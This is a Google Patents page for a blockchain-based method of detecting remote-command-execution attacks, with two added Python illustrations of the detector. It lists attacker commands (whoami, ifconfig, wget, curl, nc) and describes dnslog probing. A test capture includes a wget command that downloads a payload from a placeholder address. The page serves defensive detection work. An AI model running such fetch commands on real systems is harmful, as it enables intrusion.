CN114969727A - Attack behavior identification method, device and equipment based on block chain - Google Patents
- Publication number: CN114969727A (application CN202210609256.7A)
- Authority: CN (China)
- Prior art keywords: server, data, interaction, external device, communication data
- Legal status: Pending
Classifications
- G06F21/55: Detecting local intrusion or implementing counter-measures (under G06F21/50, Monitoring users, programs or devices to maintain the integrity of platforms, e.g. of processors, firmware or operating systems; G06F21/00, Security arrangements for protecting computers, components thereof, programs or data against unauthorised activity; G06F, Electric digital data processing; G06, Computing, calculating or counting; G, Physics)
- G06F21/577: Assessing vulnerabilities and evaluating computer system security (under G06F21/57, Certifying or maintaining trusted computer platforms, e.g. secure boots or power-downs, version controls, system software checks, secure updates or assessing vulnerabilities; G06F21/50; G06F21/00)
- G06F21/64: Protecting data integrity, e.g. using checksums, certificates or signatures (under G06F21/60, Protecting data; G06F21/00)
Abstract
The embodiments of the specification disclose a blockchain-based attack behavior identification method, device and equipment. The method comprises the following steps: capturing, in real time, the communication data exchanged between the server and an external device during an interaction; extracting feature data of the kind corresponding to the interaction type from the communication data; querying a security rule of the corresponding type from the blockchain according to the interaction type; and detecting the feature data with the security rule to identify whether the interaction belongs to attack behavior. The embodiments of the specification can detect in real time whether the interaction behavior between the server and the external device belongs to attack behavior, which improves security.
Description
Technical Field
The embodiment of the specification relates to the technical field of block chains, in particular to an attack behavior identification method, device and equipment based on the block chains.
Background
A network attack exploits the vulnerabilities and security defects present in a network information system in order to attack the system and its resources.
In recent years network attack events have been frequent, and trojans, worms and ransomware on the Internet emerge one after another, posing serious threats to network security. How to accurately identify attack behavior is a technical problem that urgently needs to be solved.
Disclosure of Invention
Embodiments of the present specification provide an attack behavior identification method, apparatus, and device based on a blockchain, so as to detect whether an interaction behavior between a server and an external device belongs to an attack behavior in real time, thereby improving security of the server.
In a first aspect of the embodiments of the present specification, a blockchain-based attack behavior identification method is provided, which is applied to a server and includes:
capturing, in real time, the communication data exchanged between the server and an external device during an interaction;
extracting feature data of the kind corresponding to the interaction type from the communication data;
querying a security rule of the corresponding type from the blockchain according to the interaction type;
and detecting the feature data with the security rule to identify whether the interaction belongs to attack behavior.
In a second aspect of the embodiments of the present specification, a blockchain-based attack behavior identification apparatus is provided, which is applied to a server and includes:
a capturing unit, configured to capture, in real time, the communication data exchanged between the server and the external device during an interaction;
an extraction unit, configured to extract feature data of the kind corresponding to the interaction type from the communication data;
a query unit, configured to query a security rule of the corresponding type from the blockchain according to the interaction type;
and a detection unit, configured to detect the feature data with the security rule to identify whether the interaction belongs to attack behavior.
In a third aspect of the embodiments of the present specification, there is provided a computer device comprising a memory, a processor and a computer program stored on the memory and executable on the processor, the processor implementing the method steps as described in the first aspect when executing the computer program.
A fourth aspect of embodiments of the present specification provides a computer program product comprising a computer program which, when executed by a processor, performs the method steps of the first aspect.
According to the technical scheme provided by the embodiment of the specification, the communication data of the server and the external equipment during interaction are captured in real time; and according to the interaction type, acquiring the corresponding type of characteristic data and security rules to detect whether the interaction behavior between the server and the external equipment belongs to attack behavior in real time, thereby improving the security of the server and reducing the false alarm rate.
Drawings
In order to more clearly illustrate the embodiments of the present specification or the technical solutions in the prior art, the drawings used in the description of the embodiments or the prior art will be briefly introduced below, the drawings in the following description are only some embodiments described in the present specification, and for those skilled in the art, other drawings can be obtained according to the drawings without creative efforts.
FIG. 1 is a block diagram of a data processing system according to an embodiment of the present disclosure;
fig. 2 is a schematic flowchart of an attack behavior identification method based on a blockchain in an embodiment of the present disclosure;
fig. 3 is a schematic flowchart of an attack behavior identification method based on a blockchain in an embodiment of the present disclosure;
fig. 4 is a schematic structural diagram of an attack behavior recognition apparatus based on a blockchain in an embodiment of the present specification;
fig. 5 is a schematic structural diagram of a computer device in an embodiment of the present specification.
Detailed Description
The technical solutions in the embodiments of the present disclosure will be clearly and completely described below with reference to the drawings in the embodiments of the present disclosure, and it is obvious that the described embodiments are only a part of the embodiments of the present disclosure, and not all of the embodiments. All other embodiments obtained by a person skilled in the art based on the embodiments in the present specification without any inventive step should fall within the scope of protection of the present specification.
An RCE (remote command execution) vulnerability arises when developers write source code without filtering the entry points of executable special functions, so that a client can submit maliciously constructed statements that are delivered to and executed on the server side. Attacks against RCE vulnerabilities tend to be very destructive. Moreover, some RCE vulnerabilities, such as 0-day vulnerabilities, are highly covert: no one knows the attack pattern for the vulnerability in advance, so existing attack behavior detection methods have difficulty detecting such attacks.
The inventor finds that attack behavior against RCE vulnerabilities has the following characteristics: (1) when obtaining server rights, attackers often use several specific kinds of commands, such as whoami, ifconfig, ls, and the like, which are rarely used in normal business processes; (2) when an attacker encounters an RCE vulnerability that produces no echo, the attacker cannot know whether a command was executed on the victim server, and therefore uses commands such as ping and curl to request a dnslog server. Based on these considerations, the embodiments of the present specification provide a blockchain-based attack behavior identification method to identify whether an attacker, through an external device, initiates attack behavior against an RCE vulnerability of the server.
Please refer to fig. 1. The embodiment of the specification provides a data processing system. The data processing system may include a terminal device and a blockchain network. The terminal device may be a device oriented to the security administrator, including but not limited to a smartphone, a tablet electronic device, a portable computer, a desktop computer, a smart wearable device, and the like. The blockchain network may include a plurality of node devices. The plurality of node devices may be set up by one organization, in which case the blockchain network may be a private chain of that organization. Alternatively, the plurality of node devices may be set up by a plurality of organizations, in which case the blockchain network may be a consortium chain of those organizations. The organization may include a banking institution or the like. The node device may include a server or the like.
The embodiment of the specification provides an attack behavior identification method based on a block chain. The method may be applied to a server. The server may join the blockchain network as a node device.
Please refer to fig. 2 and fig. 3. The method may include the following steps.
Step S11: capturing, in real time, the communication data exchanged between the server and the external device during an interaction.
In some embodiments, the external device may be a device capable of communicating with the server, including but not limited to a smartphone, a tablet electronic device, a portable computer, a desktop computer, a smart wearable device, and the like.
In some embodiments, the types of interaction between the server and the external device may include: the external device sending an access request to the server; the server feeding back a response to the external device; the server sending an access request to the external device; and the external device feeding back a response to the server. Accordingly, the communication data exchanged during the interaction may include: a first request packet sent when the external device sends an access request to the server; a first response packet fed back by the server to the external device; a second request packet sent when the server sends an access request to the external device; and a second response packet fed back by the external device to the server.
In some embodiments, the traffic of the server may be monitored in real time. When the server interacts with the external equipment, the communication data is captured and analyzed so as to identify whether the interaction belongs to an attack behavior.
Step S13: extracting feature data of the kind corresponding to the interaction type from the communication data.
In some embodiments, a correspondence between interaction types and feature extraction manners may be set in advance; the feature extraction manner corresponding to the type of the interaction is obtained, and feature data of the corresponding kind is extracted from the communication data in that manner. Extracting feature data of the corresponding kind from the communication data may cover the following four cases.
Case 1: an attacker who is obtaining server rights often uses several specific kinds of commands, such as whoami, ifconfig, ls, and the like. Accordingly, when the external device sends an access request to the server, the system command may be extracted from the first request packet.
Case 2: when the server feeds back a response to the external device, the first response data may be extracted from the first response packet.
Case 3: when an attacker encounters an RCE vulnerability that produces no echo, the attacker cannot know whether a command was executed on the victim server, and therefore uses commands such as ping and curl to request a dnslog server. Accordingly, when the server sends an access request to the external device, the address of the external device may be extracted from the second request packet.
Case 4: when the external device feeds back a response to the server, the second response data may be extracted from the second response packet.
Step S15: querying a security rule of the corresponding type from the blockchain according to the interaction type.
In some embodiments, a variety of security rules may be stored in the blockchain in advance, with different kinds of security rules corresponding to different interaction types. Querying the corresponding kind of security rule from the blockchain may cover the following four cases.
Case 1: for the external device sending an access request to the server, the security rule may include a sensitive command set containing at least one sensitive command. The sensitive commands may be collected in advance and may include system commands that are commonly used by attackers but rarely used by normal business systems, such as whoami, ifconfig, ls, and the like.
Case 2: for the server feeding back a response to the external device, the security rule may include a first response data type set containing at least one response data type. A response data type may be the type of the response data corresponding to a sensitive command. For example, for the sensitive command whoami the corresponding response data type may be a username; for ifconfig it may be network card information; and for ls it may be a file directory.
Case 3: for the server sending an access request to the external device, the security rule may include a sensitive address set containing at least one sensitive address. A sensitive address may be an IP address or the like.
Case 4: for the external device feeding back a response to the server, the security rule may include a second response data type set containing at least one response data type. A response data type here may be the type of the response data corresponding to a detection command, such as ping or curl.
Step S17: detecting the feature data with the security rule to identify whether the interaction belongs to attack behavior.
In some embodiments, whether the extracted system command is in the sensitive command set may be detected, giving a first detection result. If the first detection result is yes, the access request sent by the external device to the server can be determined to belong to attack behavior, and the communication data may be intercepted. If the first detection result is no, the access request sent by the external device to the server can be determined not to belong to attack behavior, and the communication data may be cleared.
In some embodiments, whether the type of the first response data is in the first response data type set may be detected, giving a second detection result. If the second detection result is yes, the response fed back by the server to the external device can be determined to belong to attack behavior, and the communication data may be intercepted. If the second detection result is no, the response fed back by the server to the external device can be determined not to belong to attack behavior, and the communication data may be cleared.
In some embodiments, whether the address of the external device is in the sensitive address set may be detected, giving a third detection result. If the third detection result is yes, the access request sent by the server to the external device can be determined to belong to attack behavior, and the communication data may be intercepted. If the third detection result is no, the access request sent by the server to the external device can be determined not to belong to attack behavior, and the communication data may be cleared.
In some embodiments, whether the type of the second response data is in the second response data type set may be detected, giving a fourth detection result. If the fourth detection result is yes, the response fed back by the external device to the server can be determined to belong to attack behavior, and the communication data may be intercepted. If the fourth detection result is no, the response fed back by the external device to the server can be determined not to belong to attack behavior, and the communication data may be cleared.
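As an added illustration that is not code from the patent, the following Python models steps S13 to S17 end to end: a minimal hash-chained rule ledger stands in for the blockchain of step S15 (so a tampered rule is refused at query time), the per-type feature extractors and the response-type patterns are this example's own assumptions, and every packet, rule value and address (203.0.113.10 is a documentation address) is constructed here.

```python
import hashlib
import json
import re
from urllib.parse import parse_qs

# The four interaction types of step S11 (these names are this example's own).
EXT_REQUEST = "ext_request"          # case 1: external device -> server request
SERVER_RESPONSE = "server_response"  # case 2: server -> external device response
SERVER_REQUEST = "server_request"    # case 3: server -> external device request
EXT_RESPONSE = "ext_response"        # case 4: external device -> server response


def _digest(body):
    # SHA-256 over a canonical JSON encoding of the block body.
    return hashlib.sha256(json.dumps(body, sort_keys=True).encode()).hexdigest()


class RuleLedger:
    """Append-only, hash-chained store standing in for the blockchain of step S15.
    Each block holds one security rule for one interaction type; the hash covers
    the rule and the previous hash, so a modified rule is detected on query."""

    def __init__(self):
        self.blocks = []

    def append(self, interaction_type, rule):
        prev = self.blocks[-1]["hash"] if self.blocks else "0" * 64
        body = {"type": interaction_type, "rule": rule, "prev": prev}
        self.blocks.append({**body, "hash": _digest(body)})

    def verify(self):
        prev = "0" * 64
        for b in self.blocks:
            body = {"type": b["type"], "rule": b["rule"], "prev": b["prev"]}
            if b["prev"] != prev or _digest(body) != b["hash"]:
                return False
            prev = b["hash"]
        return True

    def query(self, interaction_type):
        """Step S15: newest rule of the given type, served only from an intact chain."""
        if not self.verify():
            raise ValueError("rule ledger failed integrity check")
        for b in reversed(self.blocks):
            if b["type"] == interaction_type:
                return b["rule"]
        raise KeyError(interaction_type)


def extract_commands(query_string):
    """Case 1 (assumed heuristic): first word of each ';', '|' or '&' segment of every parameter."""
    commands = []
    for values in parse_qs(query_string).values():
        for value in values:
            for segment in re.split(r"[;|&]+", value):
                words = segment.split()
                if words:
                    commands.append(words[0])
    return commands


def classify_response(body):
    """Cases 2 and 4: coarse pattern-based typing; the patterns are assumptions."""
    text = body.strip()
    if re.search(r"bytes from .*icmp_seq=", text):
        return "icmp_echo_reply"            # reply to a ping probe
    if re.match(r"HTTP/\d", text):
        return "http_response"              # reply to a curl probe
    if re.search(r"\binet \d+\.\d+\.\d+\.\d+|\bether\b", text):
        return "network_card_info"          # looks like ifconfig output
    if re.fullmatch(r"[a-z_][a-z0-9_-]{0,31}", text):
        return "username"                   # looks like whoami output
    lines = text.splitlines()
    if len(lines) > 1 and all(re.fullmatch(r"[\w.\-]+/?", ln.strip()) for ln in lines):
        return "file_directory"             # looks like ls output
    return "other"


def extract_features(interaction_type, packet):  # step S13: kind depends on type
    if interaction_type == EXT_REQUEST:
        return {"commands": extract_commands(packet["query"])}
    if interaction_type == SERVER_REQUEST:
        return {"address": packet["dst_ip"]}
    return {"response_type": classify_response(packet["body"])}


def detect(ledger, interaction_type, packet):
    """Steps S15 and S17: fetch the matching rule, then 'intercept' or 'clear'."""
    rule = ledger.query(interaction_type)
    feats = extract_features(interaction_type, packet)
    if interaction_type == EXT_REQUEST:
        hit = any(c in rule["sensitive_commands"] for c in feats["commands"])
    elif interaction_type == SERVER_REQUEST:
        hit = feats["address"] in rule["sensitive_addresses"]
    else:
        hit = feats["response_type"] in rule["response_types"]
    return "intercept" if hit else "clear"


def build_ledger():
    """Constructed rule sets mirroring the four cases of step S15."""
    ledger = RuleLedger()
    ledger.append(EXT_REQUEST, {"sensitive_commands": ["whoami", "ifconfig", "ls"]})
    ledger.append(SERVER_RESPONSE, {"response_types": ["username", "network_card_info", "file_directory"]})
    ledger.append(SERVER_REQUEST, {"sensitive_addresses": ["203.0.113.10"]})  # constructed
    ledger.append(EXT_RESPONSE, {"response_types": ["icmp_echo_reply", "http_response"]})
    return ledger
```

Calling `detect(build_ledger(), EXT_REQUEST, {"query": "cmd=whoami%3Bid"})` returns `"intercept"`, while a benign query such as `q=books&page=2` returns `"clear"`; the coarse `classify_response` patterns are where a real deployment would spend its false-positive budget.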
In some embodiments, the security administrator's user information and the rights held by the administrator may be maintained in the blockchain. The user information may include a name, an identity card number, a mobile phone number, and the like. If the interaction belongs to attack behavior, the server may generate a first 5G message and, according to the user information, send it to the terminal device corresponding to the security administrator. The first 5G message prompts that the interaction belongs to attack behavior. The terminal device may receive and present the first 5G message, and the security administrator can click the chatbot component in the first 5G message to view the early warning information.
The security administrator can enter operation instructions into the terminal device, such as allowing the interaction, blocking the IP address, or intercepting data packets of the same type. The terminal device may receive the operation instruction entered by the security administrator and send it to the server; the server may receive the operation instruction and perform the corresponding operation on the interaction according to it. In practice, the terminal device may send the operation instruction to the server directly, and the server may receive it directly. Alternatively, the terminal device may generate a second 5G message according to the operation instruction and send the second 5G message to the server; the server may receive the second 5G message and parse it to obtain the operation instruction.
In the blockchain-based attack behavior identification method of the embodiment of the specification, the communication data exchanged between the server and the external device during an interaction is captured in real time, and the feature data and the security rule of the type corresponding to the interaction are obtained, so that whether the interaction behavior between the server and the external device belongs to attack behavior is detected in real time, which improves the security of the server and reduces the false alarm rate.
Please refer to fig. 4. The embodiment of the specification provides a data processing device based on a block chain, which comprises the following units.
A capturing unit 21, configured to capture, in real time, communication data of the server and the external device during interaction;
an extracting unit 23, configured to extract feature data of a corresponding type from communication data according to the type of the interaction;
the query unit 24 is configured to query the security rule of the corresponding type from the block chain according to the type of the interaction;
a detecting unit 27, configured to detect the feature data by using the security rule, so as to identify whether the interaction belongs to an attack behavior.
One embodiment of a computer apparatus of the present specification is described below. Fig. 5 is a hardware configuration diagram of the computer device in this embodiment. As shown in fig. 5, the computer device may include one or more processors (only one of which is shown), memory, and a transmission module. Of course, those skilled in the art will appreciate that the hardware configuration shown in fig. 5 is only an illustration, and is not intended to limit the hardware configuration of the computer device. In practice the computer device may also comprise more or fewer component elements than those shown in fig. 5; or have a different configuration than that shown in figure 5.
The memory may comprise high speed random access memory; alternatively, non-volatile memory, such as one or more magnetic storage devices, flash memory, or other non-volatile solid-state memory may also be included. Of course, the memory may also comprise a remotely located network memory. The memory may be used to store program instructions or modules of application software, such as the program instructions or modules of the corresponding embodiments of fig. 2 of this specification.
The processor may be implemented in any suitable way. For example, the processor may take the form of, for example, a microprocessor or processor and a computer-readable medium that stores computer-readable program code (e.g., software or firmware) executable by the (micro) processor, logic gates, switches, an Application Specific Integrated Circuit (ASIC), a programmable logic controller and embedded microcontroller, and so forth. The processor may read and execute the program instructions or modules in the memory.
The transmission module may be used for data transmission via a network, for example via a network such as the internet, an intranet, a local area network, a mobile communication network, etc.
This specification also provides one embodiment of a computer program product. The computer program product may include a computer storage medium. The computer storage medium includes, but is not limited to, a Random Access Memory (RAM), a Read-Only Memory (ROM), a Cache (Cache), a Hard Disk (HDD), a Memory Card (Memory Card), and the like. The computer storage medium stores computer program instructions. The computer program instructions when executed implement: the program instructions or modules of the embodiments corresponding to fig. 2 in this description.
It should be noted that, in the present specification, each embodiment is described in a progressive manner, and the same or similar parts in each embodiment may be referred to each other, and each embodiment focuses on differences from other embodiments. In particular, apparatus embodiments, computer device embodiments, and computer program product embodiments are substantially similar to method embodiments and therefore are described with relative ease, where reference may be made to some of the descriptions of the method embodiments. In addition, it is understood that one skilled in the art, after reading this specification document, may conceive of any combination of some or all of the embodiments listed in this specification without the need for inventive faculty, which combinations are also within the scope of the disclosure and protection of this specification.
In the 1990s, an improvement in a technology could be clearly distinguished as an improvement in hardware (for example, an improvement in a circuit structure such as a diode, transistor or switch) or an improvement in software (an improvement in a method flow). However, as technology has advanced, many of today's method flow improvements can be regarded as direct improvements in hardware circuit structure. Designers almost always obtain the corresponding hardware circuit structure by programming an improved method flow into a hardware circuit. Thus, it cannot be said that an improvement in a method flow cannot be realized by hardware physical modules. For example, a Programmable Logic Device (PLD), such as a Field Programmable Gate Array (FPGA), is an integrated circuit whose logic functions are determined by the user programming the device. A designer "integrates" a digital system on a PLD by programming it, without requiring a chip manufacturer to design and fabricate an application-specific integrated circuit chip. Furthermore, nowadays, instead of manually making an integrated circuit chip, such programming is often implemented with "logic compiler" software, which is similar to the software compiler used in program development, while the source code to be compiled is written in a specific programming language called a Hardware Description Language (HDL). There is not just one HDL but many, such as ABEL (Advanced Boolean Expression Language), AHDL (Altera Hardware Description Language), Confluence, CUPL (Cornell University Programming Language), HDCal, JHDL (Java Hardware Description Language), Lava, Lola, MyHDL, PALASM and RHDL (Ruby Hardware Description Language); VHDL (Very-High-Speed Integrated Circuit Hardware Description Language) and Verilog are the most commonly used at present.
It will also be apparent to those skilled in the art that hardware circuitry for implementing the logical method flows can be readily obtained by a mere need to program the method flows with some of the hardware description languages described above and into an integrated circuit.
The systems, devices, modules or units illustrated in the above embodiments may be implemented by a computer chip or an entity, or by a product with certain functions. One typical implementation device is a computer. In particular, the computer may be, for example, a personal computer, a laptop computer, a cellular telephone, a camera phone, a smartphone, a personal digital assistant, a media player, a navigation device, an email device, a game console, a tablet computer, a wearable device, or a combination of any of these devices. From the above description of the embodiments, it is clear to those skilled in the art that the present specification can be implemented by software plus a necessary general hardware platform. Based on such understanding, the technical solutions of the present specification may be essentially or partially implemented in the form of software products, which may be stored in a storage medium, such as ROM/RAM, magnetic disk, optical disk, etc., and include instructions for causing a computer device (which may be a personal computer, a server, or a network device, etc.) to execute the methods described in the embodiments or some parts of the embodiments of the present specification. The description is operational with numerous general purpose or special purpose computing system environments or configurations. For example: personal computers, server computers, hand-held or portable devices, tablet-type devices, multiprocessor systems, microprocessor-based systems, set top boxes, programmable consumer electronics, network PCs, minicomputers, mainframe computers, distributed computing environments that include any of the above systems or devices, and the like.
This description may be described in the general context of computer-executable instructions, such as program modules, being executed by a computer. Generally, program modules include routines, programs, objects, components, data structures, etc. that perform particular tasks or implement particular abstract data types. The specification may also be practiced in distributed computing environments where tasks are performed by remote processing devices that are linked through a communications network. In a distributed computing environment, program modules may be located in both local and remote computer storage media including memory storage devices. While the specification has been described with examples, those skilled in the art will appreciate that there are numerous variations and permutations of the specification that do not depart from the spirit of the specification, and it is intended that the appended claims include such variations and modifications that do not depart from the spirit of the specification.
Claims (13)
1. An attack behavior identification method based on a blockchain, applied to a server and comprising:
capturing, in real time, communication data exchanged when the server interacts with an external device;
extracting feature data of a corresponding category from the communication data according to the type of the interaction;
querying a security rule of a corresponding category from a blockchain according to the type of the interaction; and
detecting the feature data using the security rule, so as to identify whether the interaction belongs to an attack behavior.
2. The method of claim 1, the capturing communication data of the server and the external device when interacting, comprising:
capturing a first request packet when the external device sends an access request to the server;
the extracting of the feature data of the corresponding category from the communication data includes:
a system command is extracted from the first request packet.
3. The method of claim 2, the querying for the respective class of security rules from the blockchain comprising:
querying a sensitive command set from a blockchain;
the detecting the feature data by using the security rule includes:
detecting whether the extracted system command is located in the sensitive command set.
4. The method of claim 1, the capturing communication data of the server and the external device when interacting, comprising:
capturing a first response packet fed back by the server to the external device;
the extracting of the feature data of the corresponding category from the communication data includes:
first response data is extracted from the first response packet.
5. The method of claim 4, the querying for the respective class of security rules from the blockchain, comprising:
querying a first set of response data types from the blockchain;
the detecting the feature data by using the security rule includes:
detecting whether the type of the first response data is in the first set of response data types.
6. The method of claim 1, the capturing communication data of the server and the external device when interacting, comprising:
capturing a second request packet when the server sends an access request to the external device;
the extracting of the feature data of the corresponding category from the communication data includes:
extracting an address of an external device from the second request packet.
7. The method of claim 6, the querying for the respective class of security rules from the blockchain, comprising:
querying a sensitive address set from the blockchain;
the detecting the feature data by using the security rule includes:
detecting whether the address of the external device is located in the sensitive address set.
8. The method of claim 1, the capturing communication data of the server and the external device when interacting, comprising:
capturing a second response packet fed back to the server by the external device;
the extracting of the feature data of the corresponding category from the communication data includes:
second response data is extracted from the second response packet.
9. The method of claim 8, the querying for the respective class of security rules from the blockchain, comprising:
querying a second set of response data types from the blockchain;
the detecting the feature data by using the security rule includes:
detecting whether the type of the second response data is in the second set of response data types.
10. The method of claim 1, further comprising:
generating a 5G message, the 5G message being used to prompt that the interaction belongs to an attack behavior; and
sending the 5G message to a terminal device.
11. An attack behavior identification device based on a blockchain, applied to a server and comprising:
a capturing unit, configured to capture, in real time, communication data exchanged when the server interacts with an external device;
an extraction unit, configured to extract feature data of a corresponding category from the communication data according to the type of the interaction;
a query unit, configured to query a security rule of a corresponding category from the blockchain according to the type of the interaction; and
a detection unit, configured to detect the feature data using the security rule, so as to identify whether the interaction belongs to an attack behavior.
12. A computer device comprising a memory, a processor and a computer program stored on the memory and executable on the processor, the processor implementing the method of any one of claims 1 to 10 when executing the computer program.
13. A computer program product comprising a computer program which, when executed by a processor, implements the method of any one of claims 1 to 10.
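Claims 1 to 9 describe one procedure with four branches: classify the interaction (inbound request, outbound response, outbound request, inbound response), extract the feature that branch calls for (system command, response data type, external address), fetch the matching rule category from the chain, and test membership. The Python below is an added illustration of that procedure and is not code from the patent. The rule sets, the captured packets and the committed digest are constructed here; a dictionary stands in for the blockchain query, and the digest check is an assumption about how a server would verify rules read from a node or a local cache before trusting them, which the claims do not specify.

```python
"""Attack detection by interaction type, following claims 1 to 9 of CN114969727A.

Added illustration, not the patent's own code. Rule sets, packets and the
committed digest are constructed; a dict stands in for the blockchain.
"""
import hashlib
import json
import shlex
from enum import Enum
from ipaddress import ip_address, ip_network
from typing import Any, Dict, List


class Interaction(Enum):
    """The four interaction types the claims distinguish."""
    INBOUND_REQUEST = "inbound_request"      # external device -> server (claims 2, 3)
    OUTBOUND_RESPONSE = "outbound_response"  # server -> external device (claims 4, 5)
    OUTBOUND_REQUEST = "outbound_request"    # server -> external device (claims 6, 7)
    INBOUND_RESPONSE = "inbound_response"    # external device -> server (claims 8, 9)


# Rule category checked for each interaction type (claims 3, 5, 7, 9).
RULE_FOR = {
    Interaction.INBOUND_REQUEST: "sensitive_commands",
    Interaction.OUTBOUND_RESPONSE: "first_response_types",
    Interaction.OUTBOUND_REQUEST: "sensitive_addresses",
    Interaction.INBOUND_RESPONSE: "second_response_types",
}

# Constructed rule sets standing in for what the server would read from the chain.
RULES_ON_CHAIN: Dict[str, List[str]] = {
    "sensitive_commands": ["rm", "chmod", "wget", "curl", "nc", "bash", "sh"],
    "first_response_types": ["application/octet-stream", "text/x-shellscript"],
    "sensitive_addresses": ["198.51.100.0/24", "203.0.113.7"],
    "second_response_types": ["application/x-executable", "text/x-shellscript"],
}


def rules_digest(rules: Dict[str, List[str]]) -> str:
    """SHA-256 over canonical JSON, so key order cannot change the digest."""
    return hashlib.sha256(json.dumps(rules, sort_keys=True).encode()).hexdigest()


# Assumption: the server pins the digest the rule set was committed under, so a
# copy fetched from any node (or a local cache) is checked before it is trusted.
COMMITTED_DIGEST = rules_digest(RULES_ON_CHAIN)


def query_rule(interaction: Interaction, rules: Dict[str, List[str]] = RULES_ON_CHAIN,
               committed_digest: str = COMMITTED_DIGEST) -> List[str]:
    """Claim 1, step 3: fetch the rule category matching the interaction type."""
    if rules_digest(rules) != committed_digest:
        raise ValueError("rule set does not match the committed digest")
    return rules[RULE_FOR[interaction]]


def extract_feature(interaction: Interaction, packet: Dict[str, Any]) -> str:
    """Claim 1, step 2: pull the feature the interaction type calls for."""
    if interaction is Interaction.INBOUND_REQUEST:
        # Claim 2: the system command in the request, reduced to the bare
        # program name so "/usr/bin/wget -O ..." is compared as "wget".
        argv = shlex.split(packet["command"])
        return argv[0].rsplit("/", 1)[-1].lower() if argv else ""
    if interaction is Interaction.OUTBOUND_REQUEST:
        # Claim 6: the external device's address in the outbound request.
        return packet["dst_address"]
    # Claims 4 and 8: the response data type, as the media type without
    # parameters and case-folded ("Text/HTML; charset=utf-8" -> "text/html").
    return packet["content_type"].split(";", 1)[0].strip().lower()


def is_attack(interaction: Interaction, packet: Dict[str, Any]) -> bool:
    """Claim 1, step 4: test the feature against the rule of its category."""
    feature = extract_feature(interaction, packet)
    rule = query_rule(interaction)
    if interaction is Interaction.OUTBOUND_REQUEST:
        # Address rules may be single hosts or CIDR ranges (claim 7).
        addr = ip_address(feature)
        return any(addr in ip_network(entry, strict=False) for entry in rule)
    return feature in rule


# Constructed captures: one hit and one miss per interaction type.
CAPTURED = [
    (Interaction.INBOUND_REQUEST, {"command": "/usr/bin/wget -O /tmp/p http://203.0.113.7/p"}),
    (Interaction.INBOUND_REQUEST, {"command": "ls -la /var/log"}),
    (Interaction.OUTBOUND_RESPONSE, {"content_type": "application/octet-stream"}),
    (Interaction.OUTBOUND_RESPONSE, {"content_type": "Text/HTML; charset=utf-8"}),
    (Interaction.OUTBOUND_REQUEST, {"dst_address": "198.51.100.23"}),
    (Interaction.OUTBOUND_REQUEST, {"dst_address": "192.0.2.10"}),
    (Interaction.INBOUND_RESPONSE, {"content_type": "Application/X-Executable"}),
    (Interaction.INBOUND_RESPONSE, {"content_type": "application/json"}),
]


def scan(captured=CAPTURED) -> List[bool]:
    """Run every captured interaction through the four-step procedure."""
    return [is_attack(kind, packet) for kind, packet in captured]


if __name__ == "__main__":
    for (kind, packet), hit in zip(CAPTURED, scan()):
        print(f"{kind.value:18} {'ATTACK' if hit else 'ok':6} {packet}")
```

Two points a practitioner would check before relying on rules of this shape: the extractor has to normalise the feature (path-stripped, case-folded) or a trivial variant of the command or media type slips past the membership test, and a rule set copied off the chain is only as trustworthy as the check that ties it back to what was committed, which is why `query_rule` refuses a copy whose digest does not match.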
Priority Applications (1)
Application Number | Priority Date | Filing Date | Title |
---|---|---|---|
CN202210609256.7A CN114969727A (en) | 2022-05-31 | 2022-05-31 | Attack behavior identification method, device and equipment based on block chain |
Publications (1)
Publication Number | Publication Date |
---|---|
CN114969727A true CN114969727A (en) | 2022-08-30 |
Family
ID=82956948
Family Applications (1)
Application Number | Title | Priority Date | Filing Date |
---|---|---|---|
CN202210609256.7A Pending CN114969727A (en) | 2022-05-31 | 2022-05-31 | Attack behavior identification method, device and equipment based on block chain |
Country Status (1)
Country | Link |
---|---|
CN (1) | CN114969727A (en) |
Citations (6)
Publication number | Priority date | Publication date | Assignee | Title |
---|---|---|---|---|
CN107580005A (en) * | 2017-11-01 | 2018-01-12 | 北京知道创宇信息技术有限公司 | Website protection method, device, website protection equipment and readable storage medium |
US20180349602A1 (en) * | 2017-06-06 | 2018-12-06 | Sap Se | Security testing framework including virtualized server-side platform |
CN110266669A (en) * | 2019-06-06 | 2019-09-20 | 武汉大学 | A method and system for general detection and location of Java Web framework vulnerability attacks |
CN110545269A (en) * | 2019-08-22 | 2019-12-06 | 西安四叶草信息技术有限公司 | Access control method, device and storage medium |
US20200213359A1 (en) * | 2018-12-28 | 2020-07-02 | Imperva, Inc. | Generating collection rules based on security rules |
CN111416818A (en) * | 2020-03-17 | 2020-07-14 | 北京金山云网络技术有限公司 | Website security protection method and device and server |
2022
- 2022-05-31 CN CN202210609256.7A patent/CN114969727A/en active Pending
Similar Documents
Publication | Title |
---|---|
US10489583B2 (en) | Detecting malicious files |
US11797677B2 (en) | Cloud based just in time memory analysis for malware detection |
RU2610254C2 (en) | System and method of determining modified web pages |
Andronio et al. | Heldroid: Dissecting and detecting mobile ransomware |
US10140451B2 (en) | Detection of malicious scripting language code in a network environment |
US9596257B2 (en) | Detection and prevention of installation of malicious mobile applications |
EP3756121B1 (en) | Anti-ransomware systems and methods using a sinkhole at an electronic device |
US7934261B1 (en) | On-demand cleanup system |
US8453244B2 (en) | Server, user device and malware detection method thereof |
EP3270317B1 (en) | Dynamic security module server device and operating method thereof |
US11693961B2 (en) | Analysis of historical network traffic to identify network vulnerabilities |
US20210194915A1 (en) | Identification of potential network vulnerability and security responses in light of real-time network risk assessment |
US20250039191A1 (en) | Visualization tool for real-time network risk assessment |
CN106415577B (en) | System and method for identifying the source of a suspicious event |
US11809556B2 (en) | System and method for detecting a malicious file |
Ahmed et al. | Survey of Keylogger technologies |
JP2009223375A (en) | Malicious web site decision device, malicious web site decision system, method thereof, and program |
CN106250761B (en) | Equipment, device and method for identifying web automation tool |
US11886585B1 (en) | System and method for identifying and mitigating cyberattacks through malicious position-independent code execution |
KR101983997B1 (en) | System and method for detecting malignant code |
CN111177726A (en) | A system vulnerability detection method, device, equipment and medium |
CN114969727A (en) | Attack behavior identification method, device and equipment based on block chain |
US20210064662A1 (en) | Data collection system for effectively processing big data |
KR20180106430A (en) | Network and host-based malware infection prevention system |
CN117914848A (en) | Method, device, electronic device and storage medium for transferring files across networks |
Legal Events
Date | Code | Title | Description |
---|---|---|---|
PB01 | Publication | ||
SE01 | Entry into force of request for substantive examination | ||